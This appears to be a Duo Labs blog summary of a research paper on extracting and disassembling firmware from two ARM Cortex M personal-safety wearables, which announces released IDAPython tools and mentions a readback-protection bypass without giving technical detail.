The explosion of the Internet of Things in recent years has resulted in the proliferation of microcontrollers into devices that impact many aspects of our daily lives. One such area Duo Labs investigated recently is the personal protection device category of consumer devices. These devices present wearers with a simpler way to more easily notify personal contacts during their daily lives. These notifications can represent a check-in to let people know, “I’m doing ok,” or to notify those contacts, “I’m in trouble and need help.” The personal protection device endeavors to let a wearer do this in a way that doesn’t require retrieving, unlocking, and operating a phone. Now, discrete devices can enable this process faster and simpler.

Duo Labs researchers recently examined two personal protection devices based on ARM Cortex M microcontrollers. The two devices presented in the accompanying paper are the Revolar Instinct and the Athena by ROAR for Good. This paper describes a methodology for retrieving device firmware, and for loading firmware into IDA Pro, a common disassembler. This paper focuses on the disassembly of this firmware, and the discussion of a novel approach to defeating readback protection discovered in one ARM Cortex M implementation.

During the course of this research, I developed code for IDA Pro to assist in loading and grooming Cortex M firmware images. The IDAPython code is comprised of two modules. The first module annotates Cortex M vector tables, which gives IDA Pro hints about where code exists in the firmware image. The Cortex M module can automatically annotate firmware with a vector table located at the start of a firmware image, or can be tailored by the end user to work with relocated tables.

The second module, called Amnesia, uses byte-level heuristics to detect ARM instructions in the firmware. Amnesia also contains heuristics that operate at the ARM instruction level to determine function boundaries based on common ARM function prologues and epilogues.

This code has been released on the Duo Labs Github, and its use is detailed in the accompanying paper.

]]>